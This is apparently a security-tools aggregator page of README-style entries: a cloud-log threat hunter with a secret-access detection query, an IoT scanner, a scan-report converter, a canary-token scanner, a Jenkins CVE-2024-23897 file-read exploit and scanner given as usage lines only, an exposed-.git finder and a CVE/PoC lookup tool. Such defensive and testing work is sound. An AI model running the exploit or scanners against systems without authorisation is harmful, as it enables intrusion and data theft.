    ],
    "AZURE": [
        {
            "accountname": "logs",
            "container": [
                "cloudgrappler"
            ]
        }
    ]
}
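
For reference, the queries file pairs each detection pattern with a source. The snippet below is a hypothetical illustration of that pairing only; the exact schema ships with CloudGrappler and may differ:

{
    "queries": [
        {
            "query": "GetFileDownloadUrls.*secrets_",
            "source": "AWS"
        }
    ]
}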

    Run command

    python3 main.py

    Example 2 - Permiso Intel Use Case

    python3 main.py -p

    [+] Running GetFileDownloadUrls.*secrets_ for AWS 
    [+] Threat Actor: LUCR3
    [+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

    Example 3 - Generate report

    python3 main.py -p -jo

reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

    Example 4 - Filtering logs based on date or time

    python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

    Example 5 - Manually adding queries and data source types

    python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

    Example 6 - Running the tool with your own queries file

    python3 main.py -f new_file.json

    Running in your Cloud and Authentication cloudgrep

    AWS

    Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

    If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

    Azure

    The simplest way to authenticate with Azure is to first run:

    az login

    This will open a browser window and prompt you to login to Azure.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols Utilized By IoT Devices

    By: Zion3R


    ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


    ~ Hilali Abdel

    USAGE

    python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

    [Add new Device]

    python3 smartthings.py -a 192.168.1.1

python3 smartthings.py -s --type TPLINK

python3 smartthings.py -s --firmware "TP-Link Archer C7v2"

Search for CVE and PoC [firmware and device type]


Scan device for open UPnP ports:

    python3 smartthings.py -s --scan upnp --id

Get data from MQTT (subscribe):

    python3 smartthings.py -s --scan mqtt --id



    Sr2T - Converts Scanning Reports To A Tabular Format

    By: Zion3R


    Scanning reports to tabular (sr2t)

    This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

    1. Nmap (XML);
    2. Nessus (XML);
    3. Nikto (XML);
    4. Dirble (XML);
    5. Testssl (JSON);
    6. Fortify (FPR).

    Rationale

    This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

    Dependencies

    1. argparse (dev-python/argparse);
    2. prettytable (dev-python/prettytable);
    3. python (dev-lang/python);
    4. xlsxwriter (dev-python/xlsxwriter).

    Install

    Using Pip:

    pip install --user sr2t

    Usage

    You can use sr2t in two ways:

    • When installed as package, call the installed script: sr2t --help.
    • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
    $ sr2t --help
    usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
    [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
    [--testssl TESTSSL [TESTSSL ...]]
    [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
    [--nmap-services] [--no-nessus-autoclassify]
    [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
    [--nessus-tls-file NESSUS_TLS_FILE]
    [--nessus-x509-file NESSUS_X509_FILE]
    [--nessus-http-file NESSUS_HTTP_FILE]
    [--nessus-smb-file NESSUS_SMB_FILE]
    [--nessus-rdp-file NESSUS_RDP_FILE]
    [--nessus-ssh-file NESSUS_SSH_FILE]
    [--nessus-min-severity NESSUS_MIN_SEVERITY]
    [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
    [--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]
[--fortify-details] [--annotation-width ANNOTATION_WIDTH]
    [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
    [-oA OUTPUT_ALL]

    Converting scanning reports to a tabular format

    optional arguments:
    -h, --help show this help message and exit
    --nmap-state NMAP_STATE
    Specify the desired state to filter (e.g.
    open|filtered).
--nmap-services Specify to output a supplemental list of detected
    services.
    --no-nessus-autoclassify
    Specify to not autoclassify Nessus results.
    --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
    Specify to override a custom Nessus autoclassify YAML
    file.
    --nessus-tls-file NESSUS_TLS_FILE
    Specify to override a custom Nessus TLS findings YAML
    file.
    --nessus-x509-file NESSUS_X509_FILE
    Specify to override a custom Nessus X.509 findings
    YAML file.
    --nessus-http-file NESSUS_HTTP_FILE
    Specify to override a custom Nessus HTTP findings YAML
    file.
    --nessus-smb-file NESSUS_SMB_FILE
    Specify to override a custom Nessus SMB findings YAML
    file.
    --nessus-rdp-file NESSUS_RDP_FILE
    Specify to override a custom Nessus RDP findings YAML
    file.
    --nessus-ssh-file NESSUS_SSH_FILE
    Specify to override a custom Nessus SSH findings YAML
    file.
    --nessus-min-severity NESSUS_MIN_SEVERITY
    Specify the minimum severity to output (e.g. 1).
    --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
    Specify the width of the pluginid column (e.g. 30).
    --nessus-sort-by NESSUS_SORT_BY
    Specify to sort output by ip-address, port, plugin-id,
    plugin-name or severity.
    --nikto-description-width NIKTO_DESCRIPTION_WIDTH
    Specify the width of the description column (e.g. 30).
    --fortify-details Specify to include the Fortify abstracts, explanations
    and recommendations for each vulnerability.
    --annotation-width ANNOTATION_WIDTH
    Specify the width of the annotation column (e.g. 30).
    -oC OUTPUT_CSV, --output-csv OUTPUT_CSV
    Specify the output CSV basename (e.g. output).
    -oT OUTPUT_TXT, --output-txt OUTPUT_TXT
    Specify the output TXT file (e.g. output.txt).
    -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the output XLSX file (e.g. output.xlsx). Only
    for Nessus at the moment
    -oA OUTPUT_ALL, --output-all OUTPUT_ALL
    Specify the output basename to output to all formats
    (e.g. output).

    specify at least one:
    --nessus NESSUS [NESSUS ...]
    Specify (multiple) Nessus XML files.
    --nmap NMAP [NMAP ...]
    Specify (multiple) Nmap XML files.
    --nikto NIKTO [NIKTO ...]
    Specify (multiple) Nikto XML files.
    --dirble DIRBLE [DIRBLE ...]
    Specify (multiple) Dirble XML files.
    --testssl TESTSSL [TESTSSL ...]
    Specify (multiple) Testssl JSON files.
    --fortify FORTIFY [FORTIFY ...]
    Specify (multiple) HP Fortify FPR files.

    Example

    A few examples

    Nessus

    To produce an XLSX format:

    $ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce a text tabular format to stdout:

    $ sr2t --nessus example/nessus.nessus
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
    | host | port | plugin id | plugin name | severity | annotations |
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
    | 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
    | 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
    | 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
    | 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
    | 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
    | 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
    | 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
    | 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
    | 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
    | 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
    | 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
    | 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
    | 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
    | 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
    | 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
    +---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

    Or to output a CSV file:

    $ sr2t --nessus example/nessus.nessus -oC example
    $ cat example_nessus.csv
    host,port,plugin id,plugin name,severity,annotations
    192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
    192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
    192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
    192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
    192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
    192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
    192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
    192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
    192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
    192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
    192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
    192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
    192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
    192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
    192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
    192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X

    Nmap

    To produce an XLSX format:

    $ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce a text tabular format to stdout:

    $ sr2t --nmap example/nmap.xml --nmap-services
    Nmap TCP:
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
    | | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
    | 192.168.23.78 | X | | X | X | X | X | X | X | | |
    | 192.168.27.243 | | | | X | X | | X | X | X | X |
    | 192.168.99.164 | | | | X | X | | X | X | X | X |
    | 192.168.228.211 | | X | | | | | | | | |
    | 192.168.171.74 | | | | X | X | | X | X | X | X |
    +-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

    Nmap Services:
    +-----------------+------+-------+---------------+-------+
    | ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
    | 192.168.23.78 | 53 | tcp | domain | open |
    | 192.168.23.78 | 88 | tcp | kerberos-sec | open |
    | 192.168.23.78 | 135 | tcp | msrpc | open |
    | 192.168.23.78 | 139 | tcp | netbios-ssn | open |
    | 192.168.23.78 | 389 | tcp | ldap | open |
    | 192.168.23.78 | 445 | tcp | microsoft-ds | open |
    | 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.27.243 | 135 | tcp | msrpc | open |
    | 192.168.27.243 | 139 | tcp | netbios-ssn | open |
    | 192.168.27.243 | 445 | tcp | microsoft-ds | open |
    | 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.27.243 | 5800 | tcp | vnc-http | open |
    | 192.168.27.243 | 5900 | tcp | vnc | open |
    | 192.168.99.164 | 135 | tcp | msrpc | open |
    | 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164 | 445 | tcp | microsoft-ds | open |
    | 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.99.164 | 5800 | tcp | vnc-http | open |
    | 192.168.99.164 | 5900 | tcp | vnc | open |
    | 192.168.228.211 | 80 | tcp | http | open |
    | 192.168.171.74 | 135 | tcp | msrpc | open |
    | 192.168.171.74 | 139 | tcp | netbios-ssn | open |
    | 192.168.171.74 | 445 | tcp | microsoft-ds | open |
    | 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
    | 192.168.171.74 | 5800 | tcp | vnc-http | open |
    | 192.168.171.74 | 5900 | tcp | vnc | open |
    +-----------------+------+-------+---------------+-------+

    Or to output a CSV file:

    $ sr2t --nmap example/nmap.xml -oC example
    $ cat example_nmap_tcp.csv
    ip address,53,80,88,135,139,389,445,3389,5800,5900
    192.168.23.78,X,,X,X,X,X,X,X,,
    192.168.27.243,,,,X,X,,X,X,X,X
    192.168.99.164,,,,X,X,,X,X,X,X
    192.168.228.211,,X,,,,,,,,
    192.168.171.74,,,,X,X,,X,X,X,X

    Nikto

    To produce an XLSX format:

    $ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce a text tabular format to stdout:

    $ sr2t --nikto example/nikto.xml
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
    | target ip | target hostname | target port | description | annotations |
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
    | 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
    | 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
    | | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
    | | | | render the content of the site in a different fashion to the MIME type | |
    +----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

    Or to output a CSV file:

    $ sr2t --nikto example/nikto.xml -oC example
    $ cat example_nikto.csv
    target ip,target hostname,target port,description,annotations
    192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
    192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
    agent to protect against some forms of XSS",X
    192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
    render the content of the site in a different fashion to the MIME type",X

    Dirble

    To produce an XLSX format:

    $ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce a text tabular format to stdout:

    $ sr2t --dirble example/dirble.xml
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
    | url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
    | http://example.org/flv | 0 | 0 | false | false | false | | X |
    | http://example.org/hire | 0 | 0 | false | false | false | | X |
    | http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | false | | X |
    | http://example.org/putty | 0 | 0 | false | false | false | | X |
    | http://example.org/receipts | 0 | 0 | false | false | false | | X |
    +-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

    Or to output a CSV file:

    $ sr2t --dirble example/dirble.xml -oC example
    $ cat example_dirble.csv
    url,code,content len,is directory,is listable,found from listable,redirect url,annotations
    http://example.org/flv,0,0,false,false,false,,X
    http://example.org/hire,0,0,false,false,false,,X
    http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
    http://example.org/print_order,0,0,false,false,false,,X
    http://example.org/putty,0,0,false,false,false,,X
    http://example.org/receipts,0,0,false,false,false,,X

    Testssl

    To produce an XLSX format:

    $ sr2t --testssl example/testssl.json -oX example.xlsx

To produce a text tabular format to stdout:

    $ sr2t --testssl example/testssl.json
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
    | ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
    | rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
    +-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

    Or to output a CSV file:

    $ sr2t --testssl example/testssl.json -oC example
    $ cat example_testssl.csv
    ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
    rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

    Fortify

    To produce an XLSX format:

    $ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce a text tabular format to stdout:

    $ sr2t --fortify example/fortify.fpr
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
    | | type | subtype | severity | confidence | annotations |
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
    | example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
    | example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
    | example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
    | example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
    | example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
    | example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
    +--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

    Or to output a CSV file:

    $ sr2t --fortify example/fortify.fpr -oC example
    $ cat example_fortify.csv
    ,type,subtype,severity,confidence,annotations
    example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
    example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
    example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
    example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
    example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

    Donate

    • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


    CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (docx, xlsx, pptx, pdf)

    By: Zion3R


    Detecting Canary Tokens and Suspicious URLs in Microsoft Office, Acrobat Reader PDF and Zip Files

    Introduction

    In the dynamic realm of cybersecurity, vigilance and proactive defense are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.


    Understanding the Script

    Identification

The script identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. Office documents and Zip files are zip archives whose contents can be examined programmatically, while PDFs are scanned without decompression.


    Decompression and Scanning

    For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.


    Ignoring Certain URLs

    To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused analysis on unusual or potentially harmful URLs.


    Flagging Suspicious Files

    Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.


    Cleanup and Restoration

    Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.
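
Putting these steps together, the core flow can be approximated in a short Python sketch. The ignore list and URL regex here are simplified placeholders, and the real script is more thorough:

import os
import re
import shutil
import sys
import tempfile
import zipfile

# Hypothetical ignore list; the real script ships a fuller set of common domains.
IGNORED_DOMAINS = ("schemas.openxmlformats.org", "purl.org", "www.w3.org")
URL_RE = re.compile(rb"https?://[^\s\"'<>]+")

def scan_archive(path):
    """Decompress a zip-based document and return URLs not on the ignore list."""
    suspicious = []
    tmpdir = tempfile.mkdtemp()
    try:
        with zipfile.ZipFile(path) as archive:  # Office docs and Zips are zip archives
            archive.extractall(tmpdir)
        for root, _, files in os.walk(tmpdir):
            for name in files:
                with open(os.path.join(root, name), "rb") as handle:
                    for url in URL_RE.findall(handle.read()):
                        text = url.decode(errors="replace")
                        if not any(d in text for d in IGNORED_DOMAINS):
                            suspicious.append(text)  # flag unusual URLs
    finally:
        shutil.rmtree(tmpdir)  # cleanup: remove decompressed files, leaving no traces
    return suspicious

if __name__ == "__main__":
    for url in scan_archive(sys.argv[1]):
        print("SUSPICIOUS:", url)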


    Usage

    To effectively utilize the script:

1. Setup: Ensure Python is installed on your system and place the script in an accessible location.
2. Execution: Run the script with the command python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH (replace FILE_OR_DIRECTORY_PATH with the actual file or directory path).
3. Interpretation: Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.

    Script Showcase


    An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.


    Disclaimer

    This script is intended for educational and security testing purposes only. Utilize it responsibly and in compliance with applicable laws and regulations.



    CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner

    By: Zion3R


    Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.


    Usage

    Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

    python CVE-2024-23897.py -t <target> -p <port> -f <file>

    or

    python CVE-2024-23897.py -i <input_file> -f <file>

Parameters:

• -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.
• -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).
• -o or --output-file: Export results to file (optional).
• -p or --port: Specify the port number. Default is 8080 (optional).
• -f or --file: Specify the file to read on the target system.


    Changelog

    [27th January 2024] - Feature Request
    • Added scanning/exploiting via input file with hosts (-i INPUT_FILE).
    • Added export to file (-o OUTPUT_FILE).

    [26th January 2024] - Initial Release
    • Initial release.

    Contributing

    Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


    Author

    Alexander Hagenah - URL - Twitter


    Disclaimer

    This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.



    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
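
Conceptually, each check boils down to requesting a well-known .git path and looking for tell-tale content. A minimal sketch of that probe (simplified to a single path, using the requests library, and not RepoReaper's actual implementation) might be:

import requests

def git_exposed(domain):
    """Return True if the domain appears to serve its .git metadata publicly."""
    for scheme in ("https", "http"):
        try:
            response = requests.get(
                f"{scheme}://{domain}/.git/HEAD", timeout=5, allow_redirects=False
            )
        except requests.RequestException:
            continue
        # A readable .git/HEAD normally starts with a ref line.
        if response.status_code == 200 and response.text.startswith("ref:"):
            return True
    return False

print(git_exposed("example.com"))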


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
• Ideal for security audits and bug bounty work.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:

Enter the path of the file containing domains

    Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:

    example.com
    subdomain.example.com
    anotherdomain.com

RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.


    Disclaimer

    This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.



    SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

    By: Zion3R


SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. It empowers cybersecurity professionals with the capability to swiftly identify and test known exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


    Features
    • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
    • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
    • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
    • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
    • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
    • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
    • User-Friendly Interface: Easy to use, providing clear and concise information.
    • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

    Usage

    Regular:

    python sploitscan.py CVE-YYYY-NNNNN

    Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

    python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

    Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

    python sploitscan.py CVE-YYYY-NNNNN -e JSON

    Patching Prioritization System

    The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

    • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
    • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
    • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
    • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
    • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
    • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

    This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
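
The decision matrix above translates directly into a small function. This is a minimal sketch using the documented default thresholds, not SploitScan's actual code; as noted, the thresholds can be adjusted to your business needs:

def patch_priority(cvss, epss, in_kev=False, public_exploit=False):
    """Map CVSS/EPSS scores (plus KEV/exploit status) to a priority rating."""
    if in_kev or public_exploit:
        return "A+"  # highest risk and urgency for patching
    if cvss >= 6.0:
        return "A" if epss >= 0.2 else "B"
    return "C" if epss >= 0.2 else "D"

print(patch_priority(7.5, 0.35))  # -> A: high severity, likely exploitation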


    Changelog

    [17th February 2024] - Enhancement Update
    • Additional Information: Added further information such as references & vector string
    • Removed: Star count in publicly available exploits

    [15th January 2024] - Enhancement Update
